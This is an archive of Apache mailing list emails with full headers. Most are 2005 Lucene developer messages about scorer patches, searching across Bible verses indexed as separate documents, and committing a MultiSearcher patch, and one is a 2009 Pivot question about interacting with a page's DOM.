are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 29 21:37:27 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33950 invoked from network); 29 Mar 2005 21:37:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2005 21:37:27 -0000 Received: (qmail 71527 invoked by uid 500); 29 Mar 2005 21:37:20 -0000 Delivered-To: [email protected] Received: (qmail 71488 invoked by uid 500); 29 Mar 2005 21:37:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 71469 invoked by uid 500); 29 Mar 2005 21:37:19 -0000 Delivered-To: [email protected] Received: (qmail 71449 invoked by uid 99); 29 Mar 2005 21:37:18 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 29 Mar 2005 13:37:15 -0800 Received: by ajax.apache.org (Postfix, from userid 99) id F07442DB; Tue, 29 Mar 2005 23:37:11 +0200 (CEST) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34193] - [PATCH] Performance improvement to DisjunctionSumScorer X-Bugzilla-Reason: AssignedTo Message-Id: <[email protected]> Date: Tue, 29 Mar 2005 23:37:11 +0200 (CEST) X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34193>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34193 ------- Additional Comments From [email protected] 2005-03-29 23:37 ------- The profile that started this was generously provided by http://www.it.com . Regards, Paul Elschot (not otherwise related to www.it.com) -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 30 12:25:14 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52447 invoked from network); 30 Mar 2005 12:25:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Mar 2005 12:25:14 -0000 Received: (qmail 86250 invoked by uid 500); 30 Mar 2005 12:25:09 -0000 Delivered-To: [email protected] Received: (qmail 86190 invoked by uid 500); 30 Mar 2005 12:25:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86161 invoked by uid 99); 30 Mar 2005 12:25:09 -0000 X-ASF-Spam-Status: No, hits=0.9 required=10.0 tests=DNS_FROM_RFC_ABUSE,FROM_ENDS_IN_NUMS,RCVD_BY_IP,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from wproxy.gmail.com (HELO wproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 30 Mar 2005 04:25:07 -0800 Received: by wproxy.gmail.com with SMTP id 50so151395wri for <[email protected]>; Wed, 30 Mar 2005 04:25:05 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:disposition-notification-to:date:user-agent:x-accept-language:mime-version:to:subject:content-type:content-transfer-encoding:from; b=rvX4Cbld/NPkdI28gSzC39WdBCfu22JOeqdnNAt/Uh0Aay+c47EtAYINIwyIGQWTnwPD+ElZGvs3AQDcBcq9RSdeITtNjJg2IntRfIr1FqgZcDJ3ugd82Nxh+QvAhr+0rPfmbey2Oi075gBq/omWAdeEBbvK3NaPJnDfw3JlJLI= Received: by 161.129.204.104 with SMTP id 48mr397140wrx; Wed, 30 Mar 2005 04:25:05 -0800 (PST) Received: from ?161.129.204.104? ([161.129.204.104]) by mx.gmail.com with ESMTP id g7sm472381wra.2161.129.204.104.25.04; Wed, 30 Mar 2005 04:25:04 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 30 Mar 2005 07:25:01 -0500 User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Document proximity Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit From: DM Smith <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi, I hope I am posting to the right list. We (sword and [email protected]) are indexing bibles with each verse becoming a document, with the verse text being indexed and the verse reference being stored. This way we can search the text and get which verses have hits. The problem is that verse is an artifical document boundary. Frequently, verses cut a paragraph into parts, a poem into stanzas, ... and the significant parts are across verses. (But we usually don't have these in our markup) Is there any thought of adding a NEAR operator that will work across documents? Specifically, find x NEAR y, where the distance given to near is not understood as words but documents. (We do have a solution that stands entirely outside of lucene, but it would be better (for us :) if Lucene had the capability.) It would also be good to have the ability to have search automatically consider that adjacent documents are flowing unless some token in the doucment interrupts the flow. In this case, search would return a compound document as a hit. Thanks, DM Smith --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 30 13:03:01 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63774 invoked from network); 30 Mar 2005 13:03:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Mar 2005 13:03:01 -0000 Received: (qmail 57251 invoked by uid 500); 30 Mar 2005 13:02:59 -0000 Delivered-To: [email protected] Received: (qmail 57211 invoked by uid 500); 30 Mar 2005 13:02:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57197 invoked by uid 99); 30 Mar 2005 13:02:59 -0000 X-ASF-Spam-Status: No, hits=0.1 required=10.0 tests=FORGED_RCVD_HELO X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from shared4.hardhathosting.com (HELO getopt.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 30 Mar 2005 05:02:57 -0800 Received: from [161.129.204.104] (75-mo3-2.acn.waw.pl [161.129.204.104]) (authenticated) by getopt.org (8.11.6/8.11.6) with ESMTP id j2UD31P29339 for <[email protected]>; Wed, 30 Mar 2005 07:03:01 -0600 Message-ID: <[email protected]> Date: Wed, 30 Mar 2005 15:02:53 +0200 From: Andrzej Bialecki <[email protected]> User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: Document proximity References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DM Smith wrote: > Hi, > > I hope I am posting to the right list. Yes. > > We (sword and [email protected]) are indexing bibles with each > verse becoming a document, with the verse text being indexed and the > verse reference being stored. This way we can search the text and get > which verses have hits. > > The problem is that verse is an artifical document boundary. You could "smear" the document boundary by adding a number of tokens from adjacent verses, directly preceding or following a given verse. Perhaps even adding a full verse from each side. If you wish, you could also artificially lower their score by adding gaps (token.setPositionIncrement()), but then exact matches would not work across boundaries, in such case you would have to add a phrase query with a slop to your main query. > > Frequently, verses cut a paragraph into parts, a poem into stanzas, ... > and the significant parts are across verses. (But we usually don't have > these in our markup) > > Is there any thought of adding a NEAR operator that will work across > documents? > > Specifically, find x NEAR y, where the distance given to near is not > understood as words but documents. > I assume that you also add fields for books and chapters. While the chapter boundary is sometimes disputed, the book boundaries are pretty accurate ;-). You could create an equivalent of the "near" operator by limiting your search within a single book (by adding a required clause), and then from the list of hits (which should be pretty small in that case) you could programmatically select verses that match your proximity criteria. > It would also be good to have the ability to have search automatically > consider that adjacent documents are flowing unless some token in the > doucment interrupts the flow. In this case, search would return a > compound document as a hit. Lucene doesn't have a notion of compound documents, it's up to the application to do that. However, it's easy to retrieve documents that precede or follow a given document. It's also easy to retieve documents that contain a given term (similar to a primary key), let's say "John 1:12". You could also add a field to flag a given document as the "end of chapter", or "end of book". I would be more than happy to help you find a good solution - I'm a born-again Christian, and I use the Sword application from time to time... -- Best regards, Andrzej Bialecki ___. ___ ___ ___ _ _ __________________________________ [__ || __|__/|__||\/| Information Retrieval, Semantic Web ___|||__|| \| || | Embedded Unix, System Integration http://www.sigram.com Contact: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 30 18:25:48 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 1417 invoked from network); 30 Mar 2005 18:25:47 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Mar 2005 18:25:47 -0000 Received: (qmail 76739 invoked by uid 500); 30 Mar 2005 18:25:46 -0000 Delivered-To: [email protected] Received: (qmail 76470 invoked by uid 500); 30 Mar 2005 18:25:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 76454 invoked by uid 99); 30 Mar 2005 18:25:44 -0000 X-ASF-Spam-Status: No, hits=0.9 required=10.0 tests=DNS_FROM_RFC_ABUSE,FROM_ENDS_IN_NUMS,RCVD_BY_IP,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from wproxy.gmail.com (HELO wproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 30 Mar 2005 10:25:43 -0800 Received: by wproxy.gmail.com with SMTP id 36so308950wra for <[email protected]>; Wed, 30 Mar 2005 10:25:41 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:references; b=jzIilyU8CY9aXK/UPq9Dl3QxJleYdCRxYRV0AgoQESdTbbcm2skOUktYjtGj9jGx8nDUpwadlDqFLUybHTqhGq6E7SkD7uDOBIPoBXS6bSzHugLaoJh3LJKGDgeAeHOYyIB1j0whr+ZA0rwyKAmc5lWOhmiuG0TvVshktnCGh9I= Received: by 161.129.204.104 with SMTP id h73mr844762wrh; Wed, 30 Mar 2005 10:25:39 -0800 (PST) Received: by 161.129.204.104 with HTTP; Wed, 30 Mar 2005 10:25:39 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 30 Mar 2005 12:25:39 -0600 From: DM Smith <[email protected]> Reply-To: DM Smith <[email protected]> To: [email protected] Subject: Re: Document proximity In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit References: <[email protected]> <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N We already have a solution, and it is external to Lucene. We look for hits on things that are to be adjacent, get their "canonical" reference and then compare the distances between these. While this works well, I was hoping for a solution within Lucene. This does not give us the ability to look for phrases across verse boundaries. As to storing book or chapter in the index, we don't do that, just the whole reference. This is worth looking into as it would help in doing range restricted searches. Today, we do the restriction after the search. On Wed, 30 Mar 2005 15:02:53 +0200, Andrzej Bialecki <[email protected]> wrote: > DM Smith wrote: > > Hi, > > > > I hope I am posting to the right list. > > Yes. > > > > > We (sword and [email protected]) are indexing bibles with each > > verse becoming a document, with the verse text being indexed and the > > verse reference being stored. This way we can search the text and get > > which verses have hits. > > > > The problem is that verse is an artifical document boundary. > > You could "smear" the document boundary by adding a number of tokens > from adjacent verses, directly preceding or following a given verse. > Perhaps even adding a full verse from each side. > > If you wish, you could also artificially lower their score by adding > gaps (token.setPositionIncrement()), but then exact matches would not > work across boundaries, in such case you would have to add a phrase > query with a slop to your main query. > > > > > Frequently, verses cut a paragraph into parts, a poem into stanzas, ... > > and the significant parts are across verses. (But we usually don't have > > these in our markup) > > > > Is there any thought of adding a NEAR operator that will work across > > documents? > > > > Specifically, find x NEAR y, where the distance given to near is not > > understood as words but documents. > > > > I assume that you also add fields for books and chapters. While the > chapter boundary is sometimes disputed, the book boundaries are pretty > accurate ;-). You could create an equivalent of the "near" operator by > limiting your search within a single book (by adding a required clause), > and then from the list of hits (which should be pretty small in that > case) you could programmatically select verses that match your proximity > criteria. > > > It would also be good to have the ability to have search automatically > > consider that adjacent documents are flowing unless some token in the > > doucment interrupts the flow. In this case, search would return a > > compound document as a hit. > > Lucene doesn't have a notion of compound documents, it's up to the > application to do that. However, it's easy to retrieve documents that > precede or follow a given document. It's also easy to retieve documents > that contain a given term (similar to a primary key), let's say "John > 1:12". You could also add a field to flag a given document as the "end > of chapter", or "end of book". > > I would be more than happy to help you find a good solution - I'm a > born-again Christian, and I use the Sword application from time to time... > > -- > Best regards, > Andrzej Bialecki > ___. ___ ___ ___ _ _ __________________________________ > [__ || __|__/|__||\/| Information Retrieval, Semantic Web > ___|||__|| \| || | Embedded Unix, System Integration > http://www.sigram.com Contact: [email protected] > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 30 19:10:51 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 15067 invoked from network); 30 Mar 2005 19:10:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Mar 2005 19:10:51 -0000 Received: (qmail 35639 invoked by uid 500); 30 Mar 2005 19:10:48 -0000 Delivered-To: [email protected] Received: (qmail 35609 invoked by uid 500); 30 Mar 2005 19:10:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35596 invoked by uid 99); 30 Mar 2005 19:10:48 -0000 X-ASF-Spam-Status: No, hits=0.1 required=10.0 tests=FORGED_RCVD_HELO X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from shared4.hardhathosting.com (HELO getopt.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 30 Mar 2005 11:10:47 -0800 Received: from [161.129.204.104] (75-mo3-2.acn.waw.pl [161.129.204.104]) (authenticated) by getopt.org (8.11.6/8.11.6) with ESMTP id j2UJArk23256 for <[email protected]>; Wed, 30 Mar 2005 13:10:53 -0600 Message-ID: <[email protected]> Date: Wed, 30 Mar 2005 21:10:39 +0200 From: Andrzej Bialecki <[email protected]> User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: Document proximity References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DM Smith wrote: > We already have a solution, and it is external to Lucene. We look for > hits on things that are to be adjacent, get their "canonical" > reference and then compare the distances between these. While this > works well, I was hoping for a solution within Lucene. > > This does not give us the ability to look for phrases across verse boundaries. Yes and no. Let's look at this document structure: field1: current field2: prev+current+next Then, you expand each query into "field1:query OR field2:query". For terms and phrases that fit only in the current verse the score will be higher than for terms and phrases that span the verse boundary, because the former will get additional boost from matching the field1. > As to storing book or chapter in the index, we don't do that, just the > whole reference. > This is worth looking into as it would help in doing range restricted > searches. Today, we do the restriction after the search. This would need some testing, but I would suggest splitting this into two fields: one would be the book name, the other would be a combined chapter/verse, as an integer. -- Best regards, Andrzej Bialecki ___. ___ ___ ___ _ _ __________________________________ [__ || __|__/|__||\/| Information Retrieval, Semantic Web ___|||__|| \| || | Embedded Unix, System Integration http://www.sigram.com Contact: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 30 21:13:25 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 60002 invoked from network); 30 Mar 2005 21:13:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Mar 2005 21:13:25 -0000 Received: (qmail 9316 invoked by uid 500); 30 Mar 2005 21:13:22 -0000 Delivered-To: [email protected] Received: (qmail 9263 invoked by uid 500); 30 Mar 2005 21:13:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 9207 invoked by uid 500); 30 Mar 2005 21:13:21 -0000 Delivered-To: [email protected] Received: (qmail 9185 invoked by uid 99); 30 Mar 2005 21:13:20 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 30 Mar 2005 13:13:16 -0800 Received: by ajax.apache.org (Postfix, from userid 99) id BAC6B28A; Wed, 30 Mar 2005 23:13:12 +0200 (CEST) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34154] - Further improvements to BooleanScorer2 X-Bugzilla-Reason: AssignedTo Message-Id: <[email protected]> Date: Wed, 30 Mar 2005 23:13:12 +0200 (CEST) X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34154>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34154 ------- Additional Comments From [email protected] 2005-03-30 23:13 ------- In case this split is accepted: As the BooleanScorer2 of 23 March uses a delegated scorer, (or allows to access the delegated scorer directly), it also makes sense to introduce the Scorer optimization hooks score(HitCollector) and score(HitCollector, maxDoc) into BooleanScorer2, DisjunctionSumScorer, ReqOptSumScorer and ReqExclScorer. Regards, Paul Elschot -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 31 09:55:04 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74985 invoked from network); 31 Mar 2005 09:55:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Mar 2005 09:55:04 -0000 Received: (qmail 34300 invoked by uid 500); 31 Mar 2005 09:55:02 -0000 Delivered-To: [email protected] Received: (qmail 33986 invoked by uid 500); 31 Mar 2005 09:55:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33973 invoked by uid 500); 31 Mar 2005 09:55:00 -0000 Delivered-To: [email protected] Received: (qmail 33968 invoked by uid 99); 31 Mar 2005 09:55:00 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from mrelay3.uni-hannover.de (HELO mrelay3.uni-hannover.de) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 31 Mar 2005 01:55:00 -0800 Received: from server1.learninglab.uni-hannover.de (server1.l3s.uni-hannover.de [161.129.204.104]) by mrelay3.uni-hannover.de (8.12.10/8.12.10) with ESMTP id j2V9sr9e027996 for <[email protected]>; Thu, 31 Mar 2005 11:54:53 +0200 (MEST) Received: from [161.129.204.104] (pc139.l3s.uni-hannover.de [161.129.204.104]) by server1.learninglab.uni-hannover.de (Postfix) with ESMTP id 16AEC1D641F9 for <[email protected]>; Thu, 31 Mar 2005 11:54:53 +0200 (CEST) Message-ID: <[email protected]> Date: Thu, 31 Mar 2005 11:54:54 +0200 From: Wolf Siberski <[email protected]> User-Agent: Mozilla Thunderbird 1.0RC1 (Windows/20041201) X-Accept-Language: en-us, en MIME-Version: 1.0 To: Lucene Developers List <[email protected]> Subject: Re: How to proceed with Bug 31841 - MultiSearcher problems with Similarity.docFreq() ? References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Greylist: Sender IP whitelisted, not delayed by milter-greylist-1.2.2 (mrelay3.uni-hannover.de [161.129.204.104]); Thu, 31 Mar 2005 11:54:53 +0200 (MEST) X-Scanned-By: MIMEDefang 2.42 X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N As some time has passed now since I submitted the Multisearcher patch, and no objections have been raised, I would like to ask to commit it now. I have put substantial effort into it, and my concern is that conflicts with newer patches will emerge if the commit is delayed further. Thanks, Wolf Doug Cutting wrote: > Wolf Siberski wrote: > > This patch now looks great to me. +1 > > Does anyone object to comitting this patch? > > http://issues.apache.org/bugzilla/show_bug.cgi?id=31841 > > Doug --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 31 19:26:46 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 1501 invoked from network); 31 Mar 2005 19:26:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Mar 2005 19:26:46 -0000 Received: (qmail 61586 invoked by uid 500); 31 Mar 2005 19:26:44 -0000 Delivered-To: [email protected] Received: (qmail 61550 invoked by uid 500); 31 Mar 2005 19:26:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 61537 invoked by uid 99); 31 Mar 2005 19:26:43 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from dev.allthingslocal.com (HELO dev.allthingslocal.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 31 Mar 2005 11:26:42 -0800 Received: from [161.129.204.104] ([acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b.129.204.104]) (AUTH: LOGIN chuck, TLS: TLSv1/SSLv3,256bits,AES256-SHA) by dev.allthingslocal.com with esmtp; Thu, 31 Mar 2005 13:26:40 -0600 id 0007417F.424C4EF0.0000331A Message-ID: <[email protected]> Date: Thu, 31 Mar 2005 11:26:37 -0800 From: Chuck Williams <[email protected]> Organization: All Things Local User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: How to proceed with Bug 31841 - MultiSearcher problems with Similarity.docFreq() ? References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Wolf Siberski writes (3/31/2005 1:54 AM): > As some time has passed now since I submitted the Multisearcher > patch, and no objections have been raised, I would like to ask > to commit it now. I have put substantial effort into it, and my > concern is that conflicts with newer patches will emerge if > the commit is delayed further. I don't get a vote, but if I did it would be: +1 I filed the original bug, prepared the first weak attempt at a patch, and participated in the design discussion that led to Wolf fixing the problem. I haven't tried running this patch, but did just read it, and it looks solid. As we discussed in the design, this seems the best first solution as it is fairly easy to assert its correctness. Going forward, I would like to see some performance measurements and expect we'll want to introduce some optimizations, the most important of which is to cache the cumulative docFreqs for a large number of terms in a scope much larger than a single query. This is more difficult as it would require some type of coordination with the indexing processes on the remote nodes (although for a large index in most real cases there would not be any need to keep these completely synchronized, as the the instantaenous changes in docFreq's are not very important to the relevance ranking; some kind of periodic synchronization approach, analagous to optimizing indexes, would be quite sufficient). A more minor point is that allocations could be reduced in MultiSearcher.prepareWeight (e.g., a simple one is to use a single HashMap rather than a HashSet and a HashMap for computing the cumulative docFreq's for all query terms). But again, I think Wolf did the right thing in creating the easily-validated correct implementation as the first step. I'm sorry to have taken so long to review this. I hope to use it within the next 3 weaks on a scalability benchmark and will report back the results. Please do commit it as Wolf requests so that it gets synced up with other activities. E.g., the changes to BooleanQuery will need to be integrated with Paul's work assuming that gets committed as well. Thanks, Chuck --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
From [email protected] Mon Feb 16 22:11:08 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91108 invoked from network); 16 Feb 2009 22:11:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2009 22:11:08 -0000 Received: (qmail 28093 invoked by uid 500); 16 Feb 2009 22:11:08 -0000 Delivered-To: [email protected] Received: (qmail 28080 invoked by uid 500); 16 Feb 2009 22:11:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pivot-user.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 28071 invoked by uid 99); 16 Feb 2009 22:11:07 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Feb 2009 14:11:07 -0800 X-ASF-Spam-Status: No, hits=1.5 required=10.0 tests=FORGED_MUA_OIMO,MSGID_FROM_MTA_HEADER,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.devtech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Feb 2009 22:11:00 +0000 Message-ID: <[email protected]> MIME-Version: 1.0 X-MessageIsInfected: false Received: from mail.devtech.com. ([161.129.204.104]) by mail.devtech.com (JAMES SMTP Server 2.3.1-dev) with SMTP ID 260 for <[email protected]>; Mon, 16 Feb 2009 17:10:38 -0500 (EST) From: "Noel J. Bergman" <[email protected]> To: <[email protected]> Subject: Pivot as A(Java)AX element Date: Mon, 16 Feb 2009 17:10:37 -0500 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2900.3350 Importance: Normal X-Virus-Checked: Checked by ClamAV on apache.org A couple of topics I find interesting: Topic #1: How might Pivot manipulate the DOM for the page on which it sits? Topic #2: How might Pivot respond to JavaScript events on its page? And do we prefer these here or on the -dev list? --- Noel
